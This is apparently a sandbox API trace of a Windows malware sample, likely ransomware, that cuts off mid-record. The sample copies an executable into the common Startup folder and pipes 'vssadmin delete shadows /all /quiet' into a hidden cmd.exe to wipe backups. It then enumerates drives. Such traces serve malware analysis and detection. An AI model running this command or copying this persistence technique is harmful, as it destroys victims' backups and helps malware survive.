hHeap=0x6a0000, dwFlags=0x0, lpMem=0x706f80 | out: hHeap=0x6a0000) returned 1 [0153.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100000) returned 0x243f020 [0153.216] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6e3480 [0153.216] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e3480, Size=0x20) returned 0x6dd980 [0153.216] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6e3480 [0153.216] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e3480, Size=0x20) returned 0x6dd8e0 [0153.216] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0153.216] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0153.216] Wow64DisableWow64FsRedirection (in: OldValue=0x19fd94 | out: OldValue=0x19fd94*=0x1) returned 1 [0153.216] lstrlenW (lpString="kernel32.dll") returned 12 [0153.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dd980 | out: hHeap=0x6a0000) returned 1 [0153.216] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0153.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dd8e0 | out: hHeap=0x6a0000) returned 1 [0153.216] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\hgaibc.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\hgaibc.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0153.216] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\hgaibc.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\hgaibc.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0153.218] CloseHandle (hObject=0x244) returned 1 [0153.218] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6e34e0 [0153.218] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e34e0, Size=0x20) returned 0x6ddd40 [0153.218] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6e34e0 [0153.218] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e34e0, Size=0x20) returned 0x6ddb10 [0153.218] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0153.219] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0153.219] Wow64DisableWow64FsRedirection (in: OldValue=0x19fd94 | out: OldValue=0x19fd94*=0x1) returned 1 [0153.219] lstrlenW (lpString="kernel32.dll") returned 12 [0153.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ddb10 | out: hHeap=0x6a0000) returned 1 [0153.219] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0153.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ddd40 | out: hHeap=0x6a0000) returned 1 [0153.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x243f020 | out: hHeap=0x6a0000) returned 1 [0153.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e6f70 | out: hHeap=0x6a0000) returned 1 [0153.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6f6f78 | out: hHeap=0x6a0000) returned 1 [0153.223] lstrlenW (lpString="%windir%\\System32") returned 17 [0153.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b78b0 | out: hHeap=0x6a0000) returned 1 [0153.224] lstrlenW (lpString="%appdata%") returned 9 [0153.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ddc78 | out: hHeap=0x6a0000) returned 1 [0153.224] lstrlenW (lpString="%sh(Startup)%") returned 13 [0153.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dd908 | out: hHeap=0x6a0000) returned 1 [0153.224] lstrlenW (lpString="%sh(Common Startup)%") returned 20 [0153.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b7430 | out: hHeap=0x6a0000) returned 1 [0153.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6e34e0 [0153.224] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e34e0, Size=0x20) returned 0x6dda70 [0153.224] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6dda70, Size=0x40) returned 0x6b78b0 [0153.224] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b78b0, Size=0x80) returned 0x6e39c8 [0153.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6e34e0 [0153.224] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e34e0, Size=0x20) returned 0x6ddd40 [0153.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fffc) returned 0x6e6f70 [0153.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x706f78 [0153.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x716f80 [0153.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6e34e0 [0153.225] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e34e0, Size=0x20) returned 0x6ddbb0 [0153.225] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6ddbb0, Size=0x40) returned 0x6b7430 [0153.225] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b7430, Size=0x80) returned 0x6e3a50 [0153.225] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e3a50, Size=0x100) returned 0x6e3a50 [0153.225] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0153.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e3a50 | out: hHeap=0x6a0000) returned 1 [0153.225] ExpandEnvironmentStringsW (in: lpSrc="%comspec%", lpDst=0x706f78, nSize=0x7fff | out: lpDst="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0153.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x716f80 | out: hHeap=0x6a0000) returned 1 [0153.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x706f78 | out: hHeap=0x6a0000) returned 1 [0153.227] CreatePipe (in: hReadPipe=0x19fd50, hWritePipe=0x19fd54, lpPipeAttributes=0x19fd40, nSize=0x0 | out: hReadPipe=0x19fd50*=0x248, hWritePipe=0x19fd54*=0x24c) returned 1 [0153.230] CreatePipe (in: hReadPipe=0x19fdc0, hWritePipe=0x19fdc4, lpPipeAttributes=0x19fd40, nSize=0x0 | out: hReadPipe=0x19fdc0*=0x250, hWritePipe=0x19fdc4*=0x254) returned 1 [0153.231] SetHandleInformation (hObject=0x24c, dwMask=0x1, dwFlags=0x0) returned 1 [0153.234] SetHandleInformation (hObject=0x250, dwMask=0x1, dwFlags=0x0) returned 1 [0153.234] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\cmd.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19fd60*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x248, hStdOutput=0x254, hStdError=0x254), lpProcessInformation=0x19fdb0 | out: lpCommandLine=0x0, lpProcessInformation=0x19fdb0*(hProcess=0x25c, hThread=0x258, dwProcessId=0xe40, dwThreadId=0xe44)) returned 1 [0153.312] lstrlenA (lpString="mode con cp select=1251\nvssadmin delete shadows /all /quiet\nExit\n") returned 65 [0153.312] WriteFile (in: hFile=0x24c, lpBuffer=0x6e39c8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x19fd5c, lpOverlapped=0x0 | out: lpBuffer=0x6e39c8*, lpNumberOfBytesWritten=0x19fd5c*=0x41, lpOverlapped=0x0) returned 1 [0153.312] CloseHandle (hObject=0x25c) returned 1 [0153.312] CloseHandle (hObject=0x258) returned 1 [0153.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e6f70 | out: hHeap=0x6a0000) returned 1 [0153.312] lstrlenA (lpString="mode con cp select=1251\nvssadmin delete shadows /all /quiet\nExit\n") returned 65 [0153.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e39c8 | out: hHeap=0x6a0000) returned 1 [0153.313] lstrlenW (lpString="%comspec%") returned 9 [0153.313] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ddd40 | out: hHeap=0x6a0000) returned 1 [0153.313] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40a530, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x258 [0153.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6e3480 [0153.313] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40a710, lpParameter=0x6e3480, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x25c [0153.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x6de358 [0153.314] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4098e0, lpParameter=0x6de358, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x264 [0153.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6e34e0 [0153.314] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e34e0, Size=0x20) returned 0x6ddb38 [0153.314] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6ddb38, Size=0x40) returned 0x6b7478 [0153.314] lstrlenW (lpString="ABCDEFGHIJKLMNOPQRSTUVWXYZ") returned 26 [0153.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xd0) returned 0x6bb288 [0153.314] GetLogicalDrives () returned 0x4 [0153.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10014) returned 0x6e6f70 [0153.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6e34e0 [0153.315] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e34e0, Size=0x20) returned 0x6dd8e0 [0153.315] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6dd8e0, Size=0x40) returned 0x6b7430 [0153.315] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b7430, Size=0x80) returned 0x6e39c8 [0153.315] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e39c8, Size=0x100) returned 0x6e3ae0 [0153.315] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e3ae0, Size=0x200) returned 0x6e3ae0 [0153.315] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e3ae0, Size=0x400) returned 0x6e3ae0 [0153.315] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e3ae0, Size=0x800) returned 0x6e5280 [0153.315] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e5280, Size=0x1000) returned 0x6e5280 [0153.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10000) returned 0x6f6f90 [0153.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6e34e0 [0153.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6e3120 [0153.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6de408 [0153.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6e31f8 [0153.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6de378 [0153.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e3330 [0153.316] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6de378, Size=0x8) returned 0x6de308 [0153.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e3210 [0153.316] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6de308, Size=0x10) returned 0x6e3348 [0153.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e33a8 [0153.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e3318 [0153.316] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e3348, Size=0x20) returned 0x6ddd40 [0153.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e33d8 [0153.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x6de448 [0153.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xe) returned 0x6e3240 [0153.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xe) returned 0x6e3138 [0153.316] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6ddd40, Size=0x40) returned 0x6b7430 [0153.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xe) returned 0x6e33f0 [0153.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xe) returned 0x6e3150 [0153.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xe) returned 0x6e3168 [0153.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xe) returned 0x6e3288 [0153.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e32d0 [0153.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e32a0 [0153.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x6de3a8 [0153.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e3180 [0153.317] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b7430, Size=0x80) returned 0x6e39c8 [0153.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e3228 [0153.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e3270 [0153.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e32b8 [0153.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e3198 [0153.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e3258 [0153.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6e32e8 [0153.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e3348 [0153.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x6de458 [0153.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e31b0 [0153.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e3300 [0153.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6e3378 [0153.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e31c8 [0153.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6e3360 [0153.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e33c0 [0153.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6e6a08 [0153.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e6a20 [0153.318] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e39c8, Size=0x100) returned 0x6e6a90 [0153.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e6a38 [0153.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e6a50 [0153.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e6990 [0153.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6e69f0 [0153.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e69a8 [0153.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e6a68 [0153.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x6de2e8 [0153.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e6978 [0153.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e6918 [0153.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e68b8 [0153.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x6) returned 0x6de3b8 [0153.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e69c0 [0153.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e68e8 [0153.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x6de2d8 [0153.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e69d8 [0153.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e6948 [0153.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6e6900 [0153.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e68d0 [0153.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e6930 [0153.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e6960 [0153.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xe) returned 0x6e63a8 [0153.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e6480 [0153.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6e64b0 [0153.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e6408 [0153.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e6450 [0153.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e64f8 [0153.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e62b8 [0153.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x6de2f8 [0153.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e63f0 [0153.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e6468 [0153.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e6498 [0153.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e63d8 [0153.319] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e6a90, Size=0x200) returned 0x6e6a90 [0153.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e6588 [0153.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x6de3c8 [0153.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e63c0 [0153.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e65a0 [0153.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e6438 [0153.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e64c8 [0153.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e6318 [0153.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e64e0 [0153.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e6420 [0153.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e6360 [0153.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e6570 [0153.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6e6510 [0153.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6e6558 [0153.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e6528 [0153.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e62d0 [0153.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6e6378 [0153.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6e62e8 [0153.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e6300 [0153.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6e6540 [0153.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6e6330 [0153.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e6390 [0153.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e6348 [0153.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e6828 [0153.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x6de3e8 [0153.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e6810 [0153.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e6708 [0153.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e6678 [0153.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x6de3f8 [0153.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e66f0 [0153.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6e6798 [0153.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e67e0 [0153.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e67f8 [0153.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e6720 [0153.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e6660 [0153.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e6738 [0153.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e6768 [0153.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6e65b8 [0153.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6e65d0 [0153.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e66d8 [0153.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e6648 [0153.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e6840 [0153.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6e6618 [0153.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e6858 [0153.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e6630 [0153.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e67c8 [0153.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e66a8 [0153.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e6690 [0153.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e6870 [0153.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e6780 [0153.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x6de308 [0153.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x6) returned 0x6de318 [0153.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e67b0 [0153.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e6600 [0153.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e6750 [0153.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e66c0 [0153.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e6888 [0153.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6e68a0 [0153.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x6e65e8 [0153.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x7073b8 [0153.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x7074d8 [0153.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707448 [0153.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x707340 [0153.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707388 [0153.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707430 [0153.323] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e6a90, Size=0x400) returned 0x7077a0 [0153.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x7072e0 [0153.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x7072f8 [0153.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x707400 [0153.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707460 [0153.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707478 [0153.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707310 [0153.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x7073d0 [0153.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x7073e8 [0153.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707328 [0153.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 